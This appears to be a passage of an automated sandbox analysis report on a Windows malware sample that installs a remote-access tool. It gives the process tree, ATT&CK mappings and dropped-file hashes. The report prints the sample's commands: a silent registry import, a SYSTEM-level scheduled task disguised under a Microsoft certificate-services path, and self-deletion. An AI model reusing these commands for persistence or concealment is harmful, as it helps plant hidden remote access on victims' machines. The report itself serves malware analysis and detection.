PID 2704 wrote to memory of 2776	2704	cmd.exe	39
PID 2084 wrote to memory of 2868	2084	0e903c6e2b98f30f11da65003a8aeb63d3daef5feb92da5896250f08b9758c7e.exe	40
PID 2084 wrote to memory of 2868	2084	0e903c6e2b98f30f11da65003a8aeb63d3daef5feb92da5896250f08b9758c7e.exe	40
PID 2084 wrote to memory of 2868	2084	0e903c6e2b98f30f11da65003a8aeb63d3daef5feb92da5896250f08b9758c7e.exe	40
PID 2084 wrote to memory of 2868	2084	0e903c6e2b98f30f11da65003a8aeb63d3daef5feb92da5896250f08b9758c7e.exe	40
PID 2084 wrote to memory of 2164	2084	0e903c6e2b98f30f11da65003a8aeb63d3daef5feb92da5896250f08b9758c7e.exe	41
PID 2084 wrote to memory of 2164	2084	0e903c6e2b98f30f11da65003a8aeb63d3daef5feb92da5896250f08b9758c7e.exe	41
PID 2084 wrote to memory of 2164	2084	0e903c6e2b98f30f11da65003a8aeb63d3daef5feb92da5896250f08b9758c7e.exe	41
PID 2084 wrote to memory of 2164	2084	0e903c6e2b98f30f11da65003a8aeb63d3daef5feb92da5896250f08b9758c7e.exe	41
PID 2868 wrote to memory of 2432	2868	cmd.exe	44
PID 2868 wrote to memory of 2432	2868	cmd.exe	44
PID 2868 wrote to memory of 2432	2868	cmd.exe	44
PID 2868 wrote to memory of 2432	2868	cmd.exe	44
PID 2740 wrote to memory of 2848	2740	taskeng.exe	46
PID 2740 wrote to memory of 2848	2740	taskeng.exe	46
PID 2740 wrote to memory of 2848	2740	taskeng.exe	46
PID 2740 wrote to memory of 2848	2740	taskeng.exe	46

C:\Users\Admin\AppData\Local\Temp\0e903c6e2b98f30f11da65003a8aeb63d3daef5feb92da5896250f08b9758c7e.exe
"C:\Users\Admin\AppData\Local\Temp\0e903c6e2b98f30f11da65003a8aeb63d3daef5feb92da5896250f08b9758c7e.exe"
1⤵
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2084
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C reg delete "HKEY_USERS\.DEFAULT\SOFTWARE\TektonIT" /f
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:2888
- - C:\Windows\SysWOW64\reg.exe
    reg delete "HKEY_USERS\.DEFAULT\SOFTWARE\TektonIT" /f
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2492
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C regedit /s "%SystemDrive%\Windows\SysWOW64\ruts\11.reg
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:2312
- - C:\Windows\SysWOW64\regedit.exe
    regedit /s "C:\Windows\SysWOW64\ruts\11.reg
    3⤵
    - System Location Discovery: System Language Discovery
    - Modifies data under HKEY_USERS
    - Runs .reg file with regedit
    PID:2956
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C schtasks /create /RU SYSTEM /TN "Microsoft\Windows\CertificateServicesClient\ruts" /TR "%SystemDrive%\Windows\SysWOW64\ruts\rutserv.exe" /sc onstart
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:2704
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /create /RU SYSTEM /TN "Microsoft\Windows\CertificateServicesClient\ruts" /TR "C:\Windows\SysWOW64\ruts\rutserv.exe" /sc onstart
    3⤵
    - System Location Discovery: System Language Discovery
    - Scheduled Task/Job: Scheduled Task
    PID:2776
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C schtasks /run /TN "Microsoft\Windows\CertificateServicesClient\ruts"
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:2868
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /run /TN "Microsoft\Windows\CertificateServicesClient\ruts"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2432
- C:\Windows\SysWOW64\cmd.exe
  cmd /c delete.bat
  2⤵
  - Deletes itself
  - System Location Discovery: System Language Discovery
  PID:2164

C:\Windows\system32\taskeng.exe
taskeng.exe {44D6A8F4-92AF-4068-AE3C-380754A07AED} S-1-5-18:NT AUTHORITY\System:Service:
1⤵
- Suspicious use of WriteProcessMemory
PID:2740
- C:\Windows\SysWOW64\ruts\rutserv.exe
  C:\Windows\SysWOW64\ruts\rutserv.exe
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - System Location Discovery: System Language Discovery
  - Modifies data under HKEY_USERS
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of SetWindowsHookEx
  PID:2848
- - C:\Windows\SysWOW64\ruts\rutserv.exe
    C:\Windows\SysWOW64\ruts\rutserv.exe -run_agent -second
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - System Location Discovery: System Language Discovery
    - Modifies data under HKEY_USERS
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of SetWindowsHookEx
    PID:2636

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Persistence

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Indicator Removal

T1070

File Deletion

T1070.004

Credential Access

Discovery

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\delete.bat

Filesize
90B

MD5
b43e3abdae1e36d34522a6ab097a67be

SHA1
3b741f71c2200d50311ac15340ff0db5579b365a

SHA256
51847ca013a85548723bf8d6a522eea784e7692faeed798b65505ad5ba859db5

SHA512
3c62c31b1dcdd5bdb19d8ffac6b679cf2ee5a72a7edc013b04045e41986eea3d36dc2738d7e8a94b30ddd02fda6f6f3da98023cd929b36b17a8ca75534e67a4b

Download Submit
C:\Windows\SysWOW64\ruts\11.reg

Filesize
31KB

MD5
ac47e093f35cff24d26a24ab54aed738

SHA1
a518b7c260cbc3853ea0a3b90e8f0f3dc1e9b14f

SHA256
4d719659c0f373bf6d8e576012d033cd6108e025de9ff273d5bc6664f8487a26

SHA512
7bd5a6515dc2baf570d935bc0d7c68d15cb4368e4d93c75195d502ac2ff9ace0f107be9903c3e9da79996fff71ec3c0f6a27e4f525b266d5a363387f967d354b

Download Submit
C:\Windows\SysWOW64\ruts\libeay32.dll

Filesize
1.3MB

MD5
5222eaf78313758b0520be16e3f8392e

SHA1
9c7cc8fb340618fef38422cf0c75c4c9bfb216e2

SHA256
4771b71a48190504094d104087dd431c1c40bde6fad0338a86aa42f7f2a457a5

SHA512
459503146f963c64777c56176e480e3334c5bcff2bfef14fc2925b38f1f32117c387dc957789e1691a68798c004c9e672460bda51edcc7b45fb0e1553bf66812

Download Submit
C:\Windows\SysWOW64\ruts\rfusclient.exe

Filesize
32KB

MD5
d0abc231c0b3e88c6b612b28abbf734d

SHA1
8fe931b1eb696cf3db0ca62f42df713e933e51b1

SHA256
388557172f87d67a033d7b8ea0124246af2e7c041e93fb6cfb35bb9cf733578b

SHA512
c580d199bebe61b0eac73fad805c04d318400dd0aed58deb4793e89b1c968c4640c9a7647e1e99471f8d7d99948797ca896ebbef8f70437942fcedd86c08e99c

Download Submit
C:\Windows\SysWOW64\ruts\rutserv.exe

Filesize
19.6MB

MD5
5f1953611f6c7f7abca398d6288c9397

SHA1
e9203fae4c0ff673a686f03df5df5a86a0b86e7d

SHA256
54cdd1795816f16560e0e1ac8eecc74c50de6c22c446ec7cd1c2b0a26347de26

SHA512
fdd5e3399725ace189c965ec003ca44831f8dd0e7529cc74aa01acf6c0b93356fa0052462b9acee7e894f21eeb89fb10adbba503c075ba118e789bd9548ce164

Download Submit
\Windows\SysWOW64\ruts\ssleay32.dll

Filesize
337KB

MD5
90a4b7fc6807693e68dd32b68614d989

SHA1
785484ef531ca90f323d5b017fefcff05e68093a

SHA256
4f475bd6235d2f761f6c6dbdf3f4b2f35fc6a3787e6b1b28a1912e85cb9be2f6

SHA512
97b970cb24774f141042149ac53e45b3fc42f9ce911c0ca774aa3812f48d7744434bf31d217b2a8522439d0e3f71048cc916556c18a71be61b203c942373a81c

Download Submit
memory/2084-15-0x0000000000400000-0x000000000197D000-memory.dmp

Filesize
21.5MB

Download
memory/2084-0-0x0000000000400000-0x000000000197D000-memory.dmp

Filesize
21.5MB

Download
memory/2636-29-0x0000000000400000-0x0000000001868000-memory.dmp

Filesize
20.4MB

Download
memory/2636-36-0x0000000000400000-0x0000000001868000-memory.dmp

Filesize
20.4MB

Download
memory/2636-43-0x0000000000400000-0x0000000001868000-memory.dmp

Filesize
20.4MB

Download
memory/2636-30-0x0000000000400000-0x0000000001868000-memory.dmp

Filesize
20.4MB

Download
memory/2636-31-0x0000000000400000-0x0000000001868000-memory.dmp

Filesize
20.4MB

Download
memory/2636-32-0x0000000000400000-0x0000000001868000-memory.dmp

Filesize
20.4MB

Download
memory/2636-35-0x0000000000400000-0x0000000001868000-memory.dmp

Filesize
20.4MB

Download
memory/2636-28-0x0000000000400000-0x0000000001868000-memory.dmp

Filesize
20.4MB

Download
memory/2636-37-0x0000000000400000-0x0000000001868000-memory.dmp

Filesize
20.4MB

Download
memory/2636-38-0x0000000000400000-0x0000000001868000-memory.dmp

Filesize
20.4MB

Download
memory/2636-39-0x0000000000400000-0x0000000001868000-memory.dmp

Filesize
20.4MB

Download
memory/2636-40-0x0000000000400000-0x0000000001868000-memory.dmp

Filesize
20.4MB

Download
memory/2636-41-0x0000000000400000-0x0000000001868000-memory.dmp

Filesize
20.4MB

Download
memory/2636-42-0x0000000000400000-0x0000000001868000-memory.dmp

Filesize
20.4MB

Download
memory/2848-24-0x0000000000400000-0x0000000001868000-memory.dmp

Filesize
20.4MB

Download